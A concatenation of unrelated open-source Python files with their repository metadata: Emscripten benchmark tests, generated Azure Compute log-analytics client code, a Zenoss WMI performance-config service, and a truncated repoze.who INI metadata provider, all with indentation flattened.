#JSBenchmarker('sm-emterp', SPIDERMONKEY_ENGINE, ['-s', 'EMTERPRETIFY=1', '--memory-init-file', '1']),
]
except Exception, e:
benchmarkers_error = str(e)
benchmarkers = []
class benchmark(RunnerCore):
save_dir = True
@classmethod
def setUpClass(self):
super(benchmark, self).setUpClass()
fingerprint = [time.asctime()]
try:
fingerprint.append('em: ' + Popen(['git', 'show'], stdout=PIPE).communicate()[0].split('\n')[0])
except:
pass
try:
d = os.getcwd()
os.chdir(os.path.expanduser('~/Dev/mozilla-central'))
fingerprint.append('sm: ' + filter(lambda line: 'changeset' in line,
Popen(['hg', 'tip'], stdout=PIPE).communicate()[0].split('\n'))[0])
except:
pass
finally:
os.chdir(d)
fingerprint.append('llvm: ' + LLVM_ROOT)
print 'Running Emscripten benchmarks... [ %s ]' % ' | '.join(fingerprint)
assert(os.path.exists(CLOSURE_COMPILER))
try:
index = SPIDERMONKEY_ENGINE.index("options('strict')")
SPIDERMONKEY_ENGINE = SPIDERMONKEY_ENGINE[:index-1] + SPIDERMONKEY_ENGINE[index+1:] # closure generates non-strict
except:
pass
Building.COMPILER = CLANG
Building.COMPILER_TEST_OPTS = ['-O2']
def do_benchmark(self, name, src, expected_output='FAIL', args=[], emcc_args=[], native_args=[], shared_args=[], force_c=False, reps=TEST_REPS, native_exec=None, output_parser=None, args_processor=None, lib_builder=None):
if len(benchmarkers) == 0: raise Exception('error, no benchmarkers: ' + benchmarkers_error)
args = args or [DEFAULT_ARG]
if args_processor: args = args_processor(args)
dirname = self.get_dir()
filename = os.path.join(dirname, name + '.c' + ('' if force_c else 'pp'))
f = open(filename, 'w')
f.write(src)
f.close()
print
for b in benchmarkers:
b.build(self, filename, args, shared_args, emcc_args, native_args, native_exec, lib_builder)
b.bench(args, output_parser, reps)
b.display(benchmarkers[0])
def test_primes(self):
src = r'''
#include<stdio.h>
#include<math.h>
int main(int argc, char **argv) {
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: arg = 33000; break;
case 2: arg = 130000; break;
case 3: arg = 220000; break;
case 4: arg = 610000; break;
case 5: arg = 1010000; break;
default: printf("error: %d\\n", arg); return -1;
}
int primes = 0, curri = 2;
while (primes < arg) {
int ok = true;
for (int j = 2; j < sqrtf(curri); j++) {
if (curri % j == 0) {
ok = false;
break;
}
}
if (ok) {
primes++;
}
curri++;
}
printf("lastprime: %d.\n", curri-1);
return 0;
}
'''
self.do_benchmark('primes', src, 'lastprime:')
def test_memops(self):
src = '''
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
int main(int argc, char **argv) {
int N, M;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: N = 1024*1024; M = 55; break;
case 2: N = 1024*1024; M = 400; break;
case 3: N = 1024*1024; M = 800; break;
case 4: N = 1024*1024; M = 4000; break;
case 5: N = 1024*1024; M = 8000; break;
default: printf("error: %d\\n", arg); return -1;
}
int final = 0;
char *buf = (char*)malloc(N);
for (int t = 0; t < M; t++) {
for (int i = 0; i < N; i++)
buf[i] = (i + final)%256;
for (int i = 0; i < N; i++)
final += buf[i] & 1;
final = final % 1000;
}
printf("final: %d.\\n", final);
return 0;
}
'''
self.do_benchmark('memops', src, 'final:')
def zzztest_files(self):
src = r'''
#include<stdio.h>
#include<stdlib.h>
#include<assert.h>
#include <unistd.h>
int main() {
int N = 100;
int M = 1000;
int K = 1000;
unsigned char *k = (unsigned char*)malloc(K+1), *k2 = (unsigned char*)malloc(K+1);
for (int i = 0; i < K; i++) {
k[i] = (i % 250) + 1;
}
k[K] = 0;
char buf[100];
for (int i = 0; i < N; i++) {
sprintf(buf, "/dev/shm/file-%d.dat", i);
FILE *f = fopen(buf, "w");
for (int j = 0; j < M; j++) {
fwrite(k, 1, (j % K) + 1, f);
}
fclose(f);
}
for (int i = 0; i < N; i++) {
sprintf(buf, "/dev/shm/file-%d.dat", i);
FILE *f = fopen(buf, "r");
for (int j = 0; j < M; j++) {
fread(k2, 1, (j % K) + 1, f);
}
fclose(f);
for (int j = 0; j < K; j++) {
assert(k[j] == k2[j]);
}
unlink(buf);
}
printf("ok");
return 0;
}
'''
self.do_benchmark(src, 'ok')
def test_copy(self):
src = r'''
#include<stdio.h>
struct vec {
int x, y, z;
int r, g, b;
vec(int x_, int y_, int z_, int r_, int g_, int b_) : x(x_), y(y_), z(z_), r(r_), g(g_), b(b_) {}
static vec add(vec a, vec b) {
return vec(a.x+b.x, a.y+b.y, a.z+b.z, a.r+b.r, a.g+b.g, a.b+b.b);
}
void norm() {
x %= 1024;
y %= 1024;
z %= 1024;
r %= 1024;
b %= 1024;
g %= 1024;
}
int sum() { return x + y + z + r + g + b; }
};
int main(int argc, char **argv) {
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: arg = 75; break;
case 2: arg = 625; break;
case 3: arg = 1250; break;
case 4: arg = 5*1250; break;
case 5: arg = 10*1250; break;
default: printf("error: %d\\n", arg); return -1;
}
int total = 0;
for (int i = 0; i < arg; i++) {
for (int j = 0; j < 50000; j++) {
vec c(i, i+i%10, j*2, i%255, j%120, i%15);
vec d(j+i%10, j*2, j%255, i%120, j%15, j);
vec e = c;
c.norm();
d.norm();
vec f = vec::add(c, d);
f = vec::add(e, f);
f.norm();
f = vec::add(d, f);
total += f.sum() % 100;
total %= 10240;
}
}
printf("sum:%d\n", total);
return 0;
}
'''
self.do_benchmark('copy', src, 'sum:')
def test_ifs(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
volatile int x = 0;
__attribute__ ((noinline)) int calc() {
return (x++) & 16384;
}
int main(int argc, char *argv[]) {
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: arg = 75; break;
case 2: arg = 625; break;
case 3: arg = 1250; break;
case 4: arg = 5*1250; break;
case 5: arg = 10*1250; break;
default: printf("error: %d\\n", arg); return -1;
}
int sum = 0;
for (int j = 0; j < 27000; j++) {
for (int i = 0; i < arg; i++) {
if (calc() && calc()) {
sum += 17;
} else {
sum += 19;
}
if (calc() || calc()) {
sum += 23;
}
}
}
printf("ok\n");
return sum;
}
'''
self.do_benchmark('ifs', src, 'ok', reps=TEST_REPS*5)
def test_conditionals(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: arg = 3*75; break;
case 2: arg = 3*625; break;
case 3: arg = 3*1250; break;
case 4: arg = 3*5*1250; break;
case 5: arg = 3*10*1250; break;
default: printf("error: %d\\n", arg); return -1;
}
int x = 0;
for (int j = 0; j < 27000; j++) {
for (int i = 0; i < arg; i++) {
if (((x*x+11) % 3 == 0) | ((x*(x+2)+17) % 5 == 0)) {
x += 2;
} else {
x++;
}
}
}
printf("ok %d\n", x);
return x;
}
'''
self.do_benchmark('conditionals', src, 'ok', reps=TEST_REPS*5)
def test_fannkuch(self):
src = open(path_from_root('tests', 'fannkuch.cpp'), 'r').read().replace(
'int n = argc > 1 ? atoi(argv[1]) : 0;',
'''
int n;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: n = 9; break;
case 2: n = 10; break;
case 3: n = 11; break;
case 4: n = 11; break;
case 5: n = 12; break;
default: printf("error: %d\\n", arg); return -1;
}
'''
)
assert 'switch(arg)' in src
self.do_benchmark('fannkuch', src, 'Pfannkuchen(')
def test_corrections(self):
src = r'''
#include<stdio.h>
#include<math.h>
int main(int argc, char **argv) {
int N, M;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: N = 20000; M = 550; break;
case 2: N = 20000; M = 3500; break;
case 3: N = 20000; M = 7000; break;
case 4: N = 20000; M = 5*7000; break;
case 5: N = 20000; M = 10*7000; break;
default: printf("error: %d\\n", arg); return -1;
}
unsigned int f = 0;
unsigned short s = 0;
for (int t = 0; t < M; t++) {
for (int i = 0; i < N; i++) {
f += i / ((t % 5)+1);
if (f > 1000) f /= (t % 3)+1;
if (i % 4 == 0) f += i * (i % 8 == 0 ? 1 : -1);
s += (short(f)*short(f)) % 256;
}
}
printf("final: %d:%d.\n", f, s);
return 0;
}
'''
self.do_benchmark('corrections', src, 'final:', emcc_args=['-s', 'CORRECT_SIGNS=1', '-s', 'CORRECT_OVERFLOWS=1', '-s', 'CORRECT_ROUNDINGS=1'])
def fasta(self, name, double_rep, emcc_args=[]):
src = open(path_from_root('tests', 'fasta.cpp'), 'r').read().replace('double', double_rep)
src = src.replace(' const size_t n = ( argc > 1 ) ? atoi( argv[1] ) : 512;', '''
int n;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: n = 19000000/20; break;
case 2: n = 19000000/2; break;
case 3: n = 19000000; break;
case 4: n = 19000000*5; break;
case 5: n = 19000000*10; break;
default: printf("error: %d\\n", arg); return -1;
}
''')
assert 'switch(arg)' in src
self.do_benchmark('fasta', src, '')
def test_fasta_float(self):
self.fasta('fasta_float', 'float')
def test_fasta_double(self):
if CORE_BENCHMARKS: return
self.fasta('fasta_double', 'double')
def test_fasta_double_full(self):
if CORE_BENCHMARKS: return
self.fasta('fasta_double_full', 'double', emcc_args=['-s', 'DOUBLE_MODE=1'])
def test_skinning(self):
src = open(path_from_root('tests', 'skinning_test_no_simd.cpp'), 'r').read()
self.do_benchmark('skinning', src, 'blah=0.000000')
def test_life(self):
if CORE_BENCHMARKS: return
src = open(path_from_root('tests', 'life.c'), 'r').read()
self.do_benchmark('life', src, '''--------------------------------''', shared_args=['-std=c99'], force_c=True)
def test_linpack_double(self):
if CORE_BENCHMARKS: return
def output_parser(output):
return 100.0/float(re.search('Unrolled Double Precision +([\d\.]+) Mflops', output).group(1))
self.do_benchmark('linpack_double', open(path_from_root('tests', 'linpack.c')).read(), '''Unrolled Double Precision''', force_c=True, output_parser=output_parser)
def test_linpack_float(self): # TODO: investigate if this might benefit from -ffast-math in LLVM 3.3+ which has fast math stuff in LLVM IR
def output_parser(output):
return 100.0/float(re.search('Unrolled Single Precision +([\d\.]+) Mflops', output).group(1))
self.do_benchmark('linpack_float', open(path_from_root('tests', 'linpack.c')).read(), '''Unrolled Single Precision''', force_c=True, output_parser=output_parser, shared_args=['-DSP'])
def test_zzz_java_nbody(self): # tests xmlvm compiled java, including bitcasts of doubles, i64 math, etc.
if CORE_BENCHMARKS: return
args = [path_from_root('tests', 'nbody-java', x) for x in os.listdir(path_from_root('tests', 'nbody-java')) if x.endswith('.c')] + \
['-I' + path_from_root('tests', 'nbody-java')]
self.do_benchmark('nbody_java', '', '''Time(s)''',
force_c=True, emcc_args=args + ['-s', 'PRECISE_I64_MATH=1', '--llvm-lto', '2'], native_args=args + ['-lgc', '-std=c99', '-target', 'x86_64-pc-linux-gnu', '-lm'])
def lua(self, benchmark, expected, output_parser=None, args_processor=None):
shutil.copyfile(path_from_root('tests', 'lua', benchmark + '.lua'), benchmark + '.lua')
def lib_builder(name, native, env_init):
ret = self.get_library('lua_native' if native else 'lua', [os.path.join('src', 'lua'), os.path.join('src', 'liblua.a')], make=['make', 'generic'], configure=None, native=native, cache_name_extra=name, env_init=env_init)
if native: return ret
shutil.copyfile(ret[0], ret[0] + '.bc')
ret[0] += '.bc'
return ret
self.do_benchmark('lua_' + benchmark, '', expected,
force_c=True, args=[benchmark + '.lua', DEFAULT_ARG], emcc_args=['--embed-file', benchmark + '.lua'],
lib_builder=lib_builder, native_exec=os.path.join('building', 'lua_native', 'src', 'lua'),
output_parser=output_parser, args_processor=args_processor)
def test_zzz_lua_scimark(self):
def output_parser(output):
return 100.0/float(re.search('\nSciMark +([\d\.]+) ', output).group(1))
self.lua('scimark', '[small problem sizes]', output_parser=output_parser)
def test_zzz_lua_binarytrees(self):
# js version: ['binarytrees.lua', {0: 0, 1: 9.5, 2: 11.99, 3: 12.85, 4: 14.72, 5: 15.82}[arguments[0]]]
self.lua('binarytrees', 'long lived tree of depth')
def test_zzz_zlib(self):
src = open(path_from_root('tests', 'zlib', 'benchmark.c'), 'r').read()
def lib_builder(name, native, env_init):
return self.get_library('zlib', os.path.join('libz.a'), make_args=['libz.a'], native=native, cache_name_extra=name, env_init=env_init)
self.do_benchmark('zlib', src, '''ok.''',
force_c=True, shared_args=['-I' + path_from_root('tests', 'zlib')], lib_builder=lib_builder)
def test_zzz_box2d(self): # Called thus so it runs late in the alphabetical cycle... it is long
src = open(path_from_root('tests', 'box2d', 'Benchmark.cpp'), 'r').read()
def lib_builder(name, native, env_init):
return self.get_library('box2d', [os.path.join('box2d.a')], configure=None, native=native, cache_name_extra=name, env_init=env_init)
self.do_benchmark('box2d', src, 'frame averages', shared_args=['-I' + path_from_root('tests', 'box2d')], lib_builder=lib_builder)
def test_zzz_bullet(self): # Called thus so it runs late in the alphabetical cycle... it is long
src = open(path_from_root('tests', 'bullet', 'Demos', 'Benchmarks', 'BenchmarkDemo.cpp'), 'r').read() + \
open(path_from_root('tests', 'bullet', 'Demos', 'Benchmarks', 'main.cpp'), 'r').read()
def lib_builder(name, native, env_init):
return self.get_library('bullet', [os.path.join('src', '.libs', 'libBulletDynamics.a'),
os.path.join('src', '.libs', 'libBulletCollision.a'),
os.path.join('src', '.libs', 'libLinearMath.a')],
configure_args=['--disable-demos','--disable-dependency-tracking'], native=native, cache_name_extra=name, env_init=env_init)
emcc_args = ['-s', 'DEAD_FUNCTIONS=["__ZSt9terminatev"]']
self.do_benchmark('bullet', src, '\nok.\n', emcc_args=emcc_args, shared_args=['-I' + path_from_root('tests', 'bullet', 'src'),
'-I' + path_from_root('tests', 'bullet', 'Demos', 'Benchmarks')], lib_builder=lib_builder)
| slightperturbation/Cobalt | ext/emsdk_portable/emscripten/1.27.0/tests/test_benchmark.py | Python | apache-2.0 | 23,045 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_export_request_rate_by_interval_request_initial(
location: str,
subscription_id: str,
*,
json: JSONType = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2019-03-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/locations/{location}/logAnalytics/apiAccess/getRequestRateByInterval')
path_format_arguments = {
"location": _SERIALIZER.url("location", location, 'str', pattern=r'^[-\w\._]+$'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
json=json,
content=content,
**kwargs
)
def build_export_throttled_requests_request_initial(
location: str,
subscription_id: str,
*,
json: JSONType = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2019-03-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/locations/{location}/logAnalytics/apiAccess/getThrottledRequests')
path_format_arguments = {
"location": _SERIALIZER.url("location", location, 'str', pattern=r'^[-\w\._]+$'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
json=json,
content=content,
**kwargs
)
class LogAnalyticsOperations(object):
"""LogAnalyticsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.compute.v2019_03_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _export_request_rate_by_interval_initial(
self,
location: str,
parameters: "_models.RequestRateByIntervalInput",
**kwargs: Any
) -> Optional["_models.LogAnalyticsOperationResult"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.LogAnalyticsOperationResult"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'RequestRateByIntervalInput')
request = build_export_request_rate_by_interval_request_initial(
location=location,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self._export_request_rate_by_interval_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('LogAnalyticsOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_export_request_rate_by_interval_initial.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/locations/{location}/logAnalytics/apiAccess/getRequestRateByInterval'} # type: ignore
@distributed_trace
def begin_export_request_rate_by_interval(
self,
location: str,
parameters: "_models.RequestRateByIntervalInput",
**kwargs: Any
) -> LROPoller["_models.LogAnalyticsOperationResult"]:
"""Export logs that show Api requests made by this subscription in the given time window to show
throttling activities.
:param location: The location upon which virtual-machine-sizes is queried.
:type location: str
:param parameters: Parameters supplied to the LogAnalytics getRequestRateByInterval Api.
:type parameters: ~azure.mgmt.compute.v2019_03_01.models.RequestRateByIntervalInput
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either LogAnalyticsOperationResult or the result
of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.mgmt.compute.v2019_03_01.models.LogAnalyticsOperationResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.LogAnalyticsOperationResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._export_request_rate_by_interval_initial(
location=location,
parameters=parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('LogAnalyticsOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_export_request_rate_by_interval.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/locations/{location}/logAnalytics/apiAccess/getRequestRateByInterval'} # type: ignore
def _export_throttled_requests_initial(
self,
location: str,
parameters: "_models.ThrottledRequestsInput",
**kwargs: Any
) -> Optional["_models.LogAnalyticsOperationResult"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.LogAnalyticsOperationResult"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'ThrottledRequestsInput')
request = build_export_throttled_requests_request_initial(
location=location,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self._export_throttled_requests_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('LogAnalyticsOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_export_throttled_requests_initial.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/locations/{location}/logAnalytics/apiAccess/getThrottledRequests'} # type: ignore
@distributed_trace
def begin_export_throttled_requests(
self,
location: str,
parameters: "_models.ThrottledRequestsInput",
**kwargs: Any
) -> LROPoller["_models.LogAnalyticsOperationResult"]:
"""Export logs that show total throttled Api requests for this subscription in the given time
window.
:param location: The location upon which virtual-machine-sizes is queried.
:type location: str
:param parameters: Parameters supplied to the LogAnalytics getThrottledRequests Api.
:type parameters: ~azure.mgmt.compute.v2019_03_01.models.ThrottledRequestsInput
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either LogAnalyticsOperationResult or the result
of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.mgmt.compute.v2019_03_01.models.LogAnalyticsOperationResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.LogAnalyticsOperationResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._export_throttled_requests_initial(
location=location,
parameters=parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('LogAnalyticsOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_export_throttled_requests.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/locations/{location}/logAnalytics/apiAccess/getThrottledRequests'} # type: ignore
| Azure/azure-sdk-for-python | sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2019_03_01/operations/_log_analytics_operations.py | Python | mit | 16,337 |
################################################################################
#
# This program is part of the WMIDataSource Zenpack for Zenoss.
# Copyright (C) 2008, 2009, 2010 Egor Puzanov.
#
# This program can be used under the GNU General Public License version 2
# You can find full information here: http://www.zenoss.com/oss
#
################################################################################
__doc__="""WmiPerfConfig
Provides Wmi config to zenperfwmi clients.
$Id: WmiPerfConfig.py,v 2.8 2010/05/20 21:29:16 egor Exp $"""
__version__ = "$Revision: 2.8 $"[11:-2]
from Products.ZenCollector.services.config import CollectorConfigService
from Products.ZenUtils.ZenTales import talesEval
import logging
log = logging.getLogger('zen.ModelerService.WmiPerfConfig')
def sortQuery(qs, table, query):
cn, kbs, ns, props = query
if not kbs: kbs = {}
ikey = tuple(kbs.keys())
ival = tuple(kbs.values())
try:
if ival not in qs[ns][cn][ikey]:
qs[ns][cn][ikey][ival] = []
qs[ns][cn][ikey][ival].append((table, props))
except KeyError:
try:
qs[ns][cn][ikey] = {}
except KeyError:
try:
qs[ns][cn] = {}
except KeyError:
qs[ns] = {}
qs[ns][cn] = {}
qs[ns][cn][ikey] = {}
qs[ns][cn][ikey][ival] = [(table, props)]
return qs
def getWbemComponentConfig(transports, comp, queries, datapoints):
threshs = []
basepath = comp.rrdPath()
perfServer = comp.device().getPerformanceServer()
for templ in comp.getRRDTemplates():
names = []
datasources = []
for tr in transports:
datasources.extend(templ.getRRDDataSources(tr))
for ds in datasources:
if not ds.enabled: continue
transport, classname, kb, namespace = ds.getInstanceInfo(comp)
if transport != transports[0]: continue
qid = comp.id + "_" + templ.id + "_" + ds.id
datapoints[qid] = []
properties = {}
compname = comp.meta_type == "Device" and "" or comp.id
for dp in ds.getRRDDataPoints():
if len(dp.aliases()) > 0:
alias = dp.aliases()[0].id.strip()
expr = talesEval("string:%s"%dp.aliases()[0].formula, comp,
extra={'now':'now'})
else:
alias = dp.id.strip()
expr = None
if alias not in properties: properties[alias] = (dp.id,)
else: properties[alias] = properties[alias] + (dp.id,)
dpname = dp.name()
names.append(dpname)
datapoints[qid].append((dp.id,
compname,
expr,
"/".join((basepath, dpname)),
dp.rrdtype,
dp.getRRDCreateCommand(perfServer),
(dp.rrdmin, dp.rrdmax)))
queries = sortQuery(queries,qid,(classname,kb,namespace,properties))
for threshold in templ.thresholds():
if not threshold.enabled: continue
for ds in threshold.dsnames:
if ds not in names: continue
threshs.append(threshold.createThresholdInstance(comp))
break
return threshs
def getWbemDeviceConfig(trs, device):
queries = {}
datapoints = {}
threshs = getWbemComponentConfig(trs, device, queries, datapoints)
for comp in device.getMonitoredComponents():
threshs.extend(getWbemComponentConfig(trs, comp, queries, datapoints))
return queries, datapoints, threshs
class WmiPerfConfig(CollectorConfigService):
def __init__(self, dmd, instance):
self.cimtransport = ['WMI', 'CIM']
deviceProxyAttributes = ('zWmiMonitorIgnore',
'zWmiProxy',
'zWinUser',
'zWinPassword')
CollectorConfigService.__init__(self, dmd, instance,
deviceProxyAttributes)
def _filterDevice(self, device):
include = CollectorConfigService._filterDevice(self, device)
zIgnore = 'z%s%sMonitorIgnore'%(self.cimtransport[0][0].upper(),
self.cimtransport[0][1:].lower())
if getattr(device, zIgnore, False):
log.debug("Device %s skipped because %s is True", device.id,zIgnore)
include = False
return include
def _createDeviceProxy(self, device):
proxy = CollectorConfigService._createDeviceProxy(self, device)
# for now, every device gets a single configCycleInterval based upon
# the collector's winCycleInterval configuration which is typically
# located at dmd.Monitors.Performance._getOb('localhost').
# TODO: create a zProperty that allows for individual device schedules
proxy.configCycleInterval = self._prefs.perfsnmpCycleInterval
proxy.queries, proxy.datapoints, proxy.thresholds = getWbemDeviceConfig(
self.cimtransport,
device)
if not proxy.queries:
log.debug("Device %s skipped because there are no datasources",
device.getId())
return None
return proxy
| anksp21/Community-Zenpacks | ZenPacks.community.WMIDataSource/ZenPacks/community/WMIDataSource/services/WmiPerfConfig.py | Python | gpl-2.0 | 5,653 |
import ConfigParser
from zope.interface import implements
# from repoze.who.interfaces import IChallenger, IIdentifier, IAuthenticator
from repoze.who.interfaces import IMetadataProvider
class INIMetadataProvider(object):
implements(IMetadataProvider)
def __init__(self, ini_file, key_attribute):
self.users = ConfigParser.ConfigParser()
self.users.readfp(open(ini_file))
self.key_attribute = key_attribute
def add_metadata(self, _environ, identity):
# logger = environ.get('repoze.who.logger','')
key = identity.get("repoze.who.userid")
try:
if self.key_attribute:
for sec in self.users.sections():
if self.users.has_option(sec, self.key_attribute):
if key in self.users.get(sec, self.key_attribute):
